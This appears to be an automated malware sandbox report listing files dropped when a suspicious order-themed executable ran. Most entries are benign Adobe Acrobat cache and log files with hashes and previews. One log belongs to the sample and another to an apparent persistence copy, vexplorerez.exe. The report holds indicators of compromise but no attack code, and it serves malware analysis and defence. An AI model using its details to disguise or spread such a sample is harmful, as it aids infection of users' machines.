                                                                          Preview:{"analyticsData":{"responseGUID":"7188a621-4852-4623-93da-6bafa632f807","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1719644502969,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"79887_247329ActionBlock_0","campaignId":79887,"containerId":"1","controlGroupId":"","treatmentId":"acc56846-d570-4500-a26e-7f8cf2b4acad","variationId":"247329"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJUcnkgQWNyb2JhdCBQcm8ifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNSIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTMiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIDctZGF5IHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0byBwcmVtaXVtIFBERiBhbmQgZS1zaWduaW5nIHRvb2xzLiIsImJ

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.309306020118079
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXGnyBKGnZiQ0Y0DoAvJfYdPeUkwRe9:YvXKXGevcEGg8Ukee9
                                                                          MD5:6B83A09BB067CB58AFD9CC91E754DE99
                                                                          SHA1:AE18E54CFFF338667A5657EC083779C847899DF7
                                                                          SHA-256:0B3A1EC01AEFBFF686937193B7ACFEAA08A5AD48DF91690B32D4A851F1228CDB
                                                                          SHA-512:3DD73BEA7F81864F040442D0543AF7D995579543AC1200577F3D2E928AB8674608A5E5F3E3550BFBA7CD07245930E6C0BDD9EE42802ADF7F3EC42597F52241D2
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"7188a621-4852-4623-93da-6bafa632f807","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1719644502969,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):1395
                                                                          Entropy (8bit):5.779052009494088
                                                                          Encrypted:false
                                                                          SSDEEP:24:Yv6XGeUTrLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNB1:Yv7xHgDv3W2aYQfgB5OUupHrQ9FJ5
                                                                          MD5:CCD13E2EA09CD80ED5A149F0F406CEB9
                                                                          SHA1:222259F5E18BF7B80EC3B7793D84FCED57E31E54
                                                                          SHA-256:5EA38D86472CA1E487E0FE1531BA5C1CF97DFD9E24C3A9D260B968B66D412826
                                                                          SHA-512:03D7207BB089022E755A78B1A3D80F0BEDE974E6BFEFF65FCE03AC13CC8DF1EBC318662F2BDC94545CFB58D078A9C90594355406EB1BC4AE063BFFC497F562CF
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"7188a621-4852-4623-93da-6bafa632f807","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1719644502969,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):291
                                                                          Entropy (8bit):5.292789158890787
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXGnyBKGnZiQ0Y0DoAvJfbPtdPeUkwRe9:YvXKXGevcEGDV8Ukee9
                                                                          MD5:D18D2C2A050533B0C7AB9F4F9F183FA9
                                                                          SHA1:1BF900272A5D1199E78EAC0EC1C1452065F4C94A
                                                                          SHA-256:51334202B444859101CA177CCB0C5856549B6A8AEE1AAB18E75ED8B7F7DD3835
                                                                          SHA-512:9866A9B28AA256E356D8A87260058F7C9B0B6D7B02B65CD67CF5CB02A0C45C9F78F84AED675055B0C426BD5B9D24D998BBCC2A418A32C6E3E9BEECBA9882824B
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"7188a621-4852-4623-93da-6bafa632f807","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1719644502969,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):287
                                                                          Entropy (8bit):5.296874565173278
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXGnyBKGnZiQ0Y0DoAvJf21rPeUkwRe9:YvXKXGevcEG+16Ukee9
                                                                          MD5:86CC4B85B752F8983DCC471B0019066C
                                                                          SHA1:2EB9B20B7B00752342AC85147953CA92F2429550
                                                                          SHA-256:FAB8C2B0AE2194FAF7FA5336E3A364826D7E5800C34F0B0049DB57D022D6E287
                                                                          SHA-512:E9BED867C019774F428EAD80DE8DB7F280DC5972D8FE6E1990DD27FB957F86CD75214F5892FDC65554D9A6B8039904EED05A1FFF65A861C3801D19C4621F2B87
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"7188a621-4852-4623-93da-6bafa632f807","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1719644502969,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.3155351258352805
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXGnyBKGnZiQ0Y0DoAvJfbpatdPeUkwRe9:YvXKXGevcEGVat8Ukee9
                                                                          MD5:245F43770C952A0585E6CAB57783FF88
                                                                          SHA1:C9D19522DB6018275838D5F80B97DD5D0168639D
                                                                          SHA-256:FEF6DE95606EF2548818078D78CA4CA94E1D7957E17C230A235CFE96008791D6
                                                                          SHA-512:DCDABF787262DFCD5A7C4F99FD92448A97B66C30B31E46D40B68F42D7191575B649A85A119FA9CB5FCB6F2296EEB899D70C7A7B1B2BE37CDFE45228105333C31
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"7188a621-4852-4623-93da-6bafa632f807","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1719644502969,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):286
                                                                          Entropy (8bit):5.273646865558952
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXGnyBKGnZiQ0Y0DoAvJfshHHrPeUkwRe9:YvXKXGevcEGUUUkee9
                                                                          MD5:496D7DE6790BA8E5026F16C11F079CD7
                                                                          SHA1:6D6A84B97438A24F62457815CA2AF3D0245C8D0A
                                                                          SHA-256:BC978FAB2A047C4C4F49ABC6BC824188B9EE714873186599E87044AB2A05CBA7
                                                                          SHA-512:396281D956095609F9048334D78966DF6C60B02557965E1945190474EE740D6BE4F8A793C54EA3091B0E6BA97542D7AE91CA7F7D25673CA8B242A40309DDC20D
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"7188a621-4852-4623-93da-6bafa632f807","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1719644502969,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):782
                                                                          Entropy (8bit):5.365146643538965
                                                                          Encrypted:false
                                                                          SSDEEP:12:YvXKXGevcEGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWV1:Yv6XGeUq168CgEXX5kcIfANhE1
                                                                          MD5:73AF355A9652E178BFB17AAD7CE8BB59
                                                                          SHA1:C59D82195325FBC1BE7A2CB8E19A6B0C8B0AF9F5
                                                                          SHA-256:B9E196C82B31129DB353CC0D888A1D8EB068722E3C41DF490D20E338A19B5C5D
                                                                          SHA-512:20DA82CB493D0E9DE9019E52EA90C5693BA6471B763787640B93BA9E6CE84D175E3DED0258C105687E617A61EAD7D583310F0A5EFAC0258FB343AA5A9EE4C6CC
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"7188a621-4852-4623-93da-6bafa632f807","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1719644502969,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1719471432997}}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):4
                                                                          Entropy (8bit):0.8112781244591328
                                                                          Encrypted:false
                                                                          SSDEEP:3:e:e
                                                                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                          Malicious:false
                                                                          Preview:....

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):2814
                                                                          Entropy (8bit):5.132501495735191
                                                                          Encrypted:false
                                                                          SSDEEP:24:YSTA1Ncx2CmstgJFAauHayuhbb4ojZyj0SkShwCU2uf2LSu4XMf5+9Tqu1OG:YSkLZHsCJFZZEfhwH3fU4XMf09Th
                                                                          MD5:19011975BBCFFB57C6468DF5B6D0CB69
                                                                          SHA1:9F5D2E8A2368EED949A80472804A5B25329A2F07
                                                                          SHA-256:E23EF343BA51D68173973BFCFB341467DC23709D87FDFC8DA28231789C098B8E
                                                                          SHA-512:128022E9C1A9E6EF1A1F72C941059D8732079EAE472153EFBEDFE640944D89E78867356F7C7053DB3C59E5C7414A7AA3711BB93494C2E73BBEB0C2E77FBFF8C0
                                                                          Malicious:false
                                                                          Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"73936f65f8e9c5b977b1cb908de6d405","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1719471433000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"35ce5cbc52fbc71550b8a1aa03771b38","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1372,"ts":1719471433000},{"id":"Edit_InApp_Aug2020","info":{"dg":"e2d73a7415e28d61aa0adc6c297cc3c6","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":1719471432000},{"id":"DC_Reader_RHP_Banner","info":{"dg":"f9965ec6bfba7a3c14d08f5202cb3ea7","sid":"DC_Reader_RHP_Banner"},"mimeType":"file","size":1395,"ts":1719471432000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"3bad6f2f7145b1db7417ed40730ca73c","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1719471432000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"7cd1fdeebc54cc02b59fb8fa08921d74","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,"ts":1719471432000},

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24
                                                                          Category:dropped
                                                                          Size (bytes):12288
                                                                          Entropy (8bit):1.1467359030193616
                                                                          Encrypted:false
                                                                          SSDEEP:24:TLhx/XYKQvGJF7urs8TeRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudJ:TFl2GL7ms8TAXc+XcGNFlRYIX2v3krTm
                                                                          MD5:5EB328D20722F51F6D7708C2DA5E2CDE
                                                                          SHA1:E2C240E18B525918CAAE4835D7F3B854A591DBBD
                                                                          SHA-256:97C1EB77B4343371D75903C10AA96B7EEAFDEB0E5217BE5AC23C00575A844EB8
                                                                          SHA-512:F349F99F37CE87E0D2FFBB4E02F804B854B14E0E162EA7CA3C8920EF2EA0295854B581577077CCC8D6EC1CF64E8DEED1DC84ABED157C949950AE3B00B8AF2775
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:SQLite Rollback Journal
                                                                          Category:dropped
                                                                          Size (bytes):8720
                                                                          Entropy (8bit):1.5505146784904287
                                                                          Encrypted:false
                                                                          SSDEEP:48:7MxGT3Xc+XcGNFlRYIX2vmOqVl2GL7msr:7c6Xc+XckFPYIX2uOaVmsr
                                                                          MD5:E85A893254EB89BFD15FFBD36508C297
                                                                          SHA1:F69C206D90FB116F5A2BF0F77025F4089EF49EDE
                                                                          SHA-256:14B99342215A075FF623D3FDD632DE5B9B5C78D2090524ECD36CF722B0D61AC4
                                                                          SHA-512:B0DB24B353EC2C935C7E3697E482CF1F3715D7C5DB6FF82EC5CDD88E844CF275DE87F832551772347FD5CB12F95360E106DA87D7A4B11D17DF9AF0065309B917
                                                                          Malicious:false
                                                                          Preview:.... .c......BY...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................b..b.b.b.b.b.b.b.b.b.b.b.b.b..................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Orden#46789_2024_Optoflux_mexico_sderls.exe.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1216
                                                                          Entropy (8bit):5.34331486778365
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
                                                                          MD5:E193AFF55D4BDD9951CB4287A7D79653
                                                                          SHA1:F94AD920B9E0EB43B5005D74552AB84EAA38E985
                                                                          SHA-256:08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
                                                                          SHA-512:86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
                                                                          Malicious:true
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vexplorerez.exe.log

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Roaming\vexplorerez.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1216
                                                                          Entropy (8bit):5.34331486778365
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
                                                                          MD5:E193AFF55D4BDD9951CB4287A7D79653
                                                                          SHA1:F94AD920B9E0EB43B5005D74552AB84EAA38E985
                                                                          SHA-256:08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
                                                                          SHA-512:86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
                                                                          Malicious:false
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                          C:\Users\user\AppData\Local\Temp\MSIe641f.LOG

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):246
                                                                          Entropy (8bit):3.518261198325562
                                                                          Encrypted:false
                                                                          SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EOlpKH:Qw946cPbiOxDlbYnuRKvKpg
                                                                          MD5:079EA34729863CE6ADCDFF94438B3DA4
                                                                          SHA1:C61FD3CD3E8CF5E9D5DBF02DEA71580B8B3E6505
                                                                          SHA-256:249DC748D15A13452255E64469A6214699BF34FFFBBD024074BC70FFEAB4A8CA
                                                                          SHA-512:5C6CCACAD5079CAE4A68FD2A3053CF38846A8F912ED5512B3E2BA3941F99C04AA73A0F1B6D367561212D6C8A0003E35C5FEF0F199C7B5A9BD98837FEFBCCB239
                                                                          Malicious:false
                                                                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.7./.0.6./.2.0.2.4. . .0.2.:.5.7.:.1.5. .=.=.=.....

                                                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\A919k6qv0_17var3c_3s4.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                                                          Category:dropped
                                                                          Size (bytes):127214
                                                                          Entropy (8bit):7.992938944970855
                                                                          Encrypted:true
                                                                          SSDEEP:3072:uswQeDPMQviqN8xfRmKMPcSnWlG1SS7Zqc6DOR44IxtUsi5:uswtPMMrSx+0SWlG1SSO6cYsi
                                                                          MD5:997CE5ED3633E8FF84C2F7D1F0E48E53
                                                                          SHA1:D22617BDF6D8DCE13E5FCBE9BDD57A812EE1E237
                                                                          SHA-256:E06C221FB5B43F5A25220D326EB501573C2E0CC9FBB31007BF79054B6F613907
                                                                          SHA-512:CE187CD9CE4CAC28B91CD0B090A70B15E28BC59BE0CC2A1E58F4257ACBAD5C05B40D7E1ECC8F16B626BC51AFE6817E524A4326F09C3FBA85637285EA1F3291D8
                                                                          Malicious:false
                                                                          Preview:PK........,C.X...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........>.X..lz............message.xml.]Ys..~...r..S.c...-.K....v.Y.KEK...E.H*.......Z(...V.N.... ..p.s....(...$...o..=:.D..A.....w.....#....8..4;nGq.<.}?.>.#?.........,.Bq..G..v08....G.=.i.....~..Q.......4.....h...`............Z... ..~(.X.g.>..;8=...7.x.G.....v.{..^.y}s...#u+.. ...s.$.2.._t...Gyuz....x...&gO..8..$.hp#.W.@..V...x.OW.c.........."S.x...>.Y....L..1..I<..vL.{$......#.i...7X\l....S..^..?.)..9tX..V.=.3qL.a...b.Bv.....X|..O. y.5u.19...d..}{..q.d..p}......)..l..r.fk..<..v..(..o......-.f_....h..e ......Z....K.;Ka..cB<....:..x.(...v{(..!@.Z...Bg.n.<..PD.".+..0.A..5.Y...x....9.]..........d.2.h......<.j........~.+.g...8r.....].lS.9..RX@.;..........9.....8.A.......?tq....&....0..t..]...aW.....<.....Ka.=XO..C........~.F3.+.b..Y.\.,..Cq6.n..8..b`..b..{.8.......2o.S.J3U.bx;S..L..Y..L.v..LU.g....%..0U...*..\...P>...Q..e..p0#yKN.H.Br..Nh r..D..?..Vuh..q)o.D.]#h.M.A

                                                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\A9v2fa3w_17var3a_3s4.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                                                          Category:dropped
                                                                          Size (bytes):127214
                                                                          Entropy (8bit):7.992938944970855
                                                                          Encrypted:true
                                                                          SSDEEP:3072:uswQeDPMQviqN8xfRmKMPcSnWlG1SS7Zqc6DOR44IxtUsi5:uswtPMMrSx+0SWlG1SSO6cYsi
                                                                          MD5:997CE5ED3633E8FF84C2F7D1F0E48E53
                                                                          SHA1:D22617BDF6D8DCE13E5FCBE9BDD57A812EE1E237
                                                                          SHA-256:E06C221FB5B43F5A25220D326EB501573C2E0CC9FBB31007BF79054B6F613907
                                                                          SHA-512:CE187CD9CE4CAC28B91CD0B090A70B15E28BC59BE0CC2A1E58F4257ACBAD5C05B40D7E1ECC8F16B626BC51AFE6817E524A4326F09C3FBA85637285EA1F3291D8
                                                                          Malicious:false
                                                                          Preview:PK........,C.X...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........>.X..lz............message.xml.]Ys..~...r..S.c...-.K....v.Y.KEK...E.H*.......Z(...V.N.... ..p.s....(...$...o..=:.D..A.....w.....#....8..4;nGq.<.}?.>.#?.........,.Bq..G..v08....G.=.i.....~..Q.......4.....h...`............Z... ..~(.X.g.>..;8=...7.x.G.....v.{..^.y}s...#u+.. ...s.$.2.._t...Gyuz....x...&gO..8..$.hp#.W.@..V...x.OW.c.........."S.x...>.Y....L..1..I<..vL.{$......#.i...7X\l....S..^..?.)..9tX..V.=.3qL.a...b.Bv.....X|..O. y.5u.19...d..}{..q.d..p}......)..l..r.fk..<..v..(..o......-.f_....h..e ......Z....K.;Ka..cB<....:..x.(...v{(..!@.Z...Bg.n.<..PD.".+..0.A..5.Y...x....9.]..........d.2.h......<.j........~.+.g...8r.....].lS.9..RX@.;..........9.....8.A.......?tq....&....0..t..]...aW.....<.....Ka.=XO..C........~.F3.+.b..Y.\.,..Cq6.n..8..b`..b..{.8.......2o.S.J3U.bx;S..L..Y..L.v..LU.g....%..0U...*..\...P>...Q..e..p0#yKN.H.Br..Nh r..D..?..Vuh..q)o.D.]#h.M.A

                                                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-06-27 02-57-06-503.log

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with very long lines (393)
                                                                          Category:dropped
                                                                          Size (bytes):16525
                                                                          Entropy (8bit):5.338264912747007
                                                                          Encrypted:false
                                                                          SSDEEP:384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb
                                                                          MD5:128A51060103D95314048C2F32A15C66
                                                                          SHA1:EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB
                                                                          SHA-256:601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713
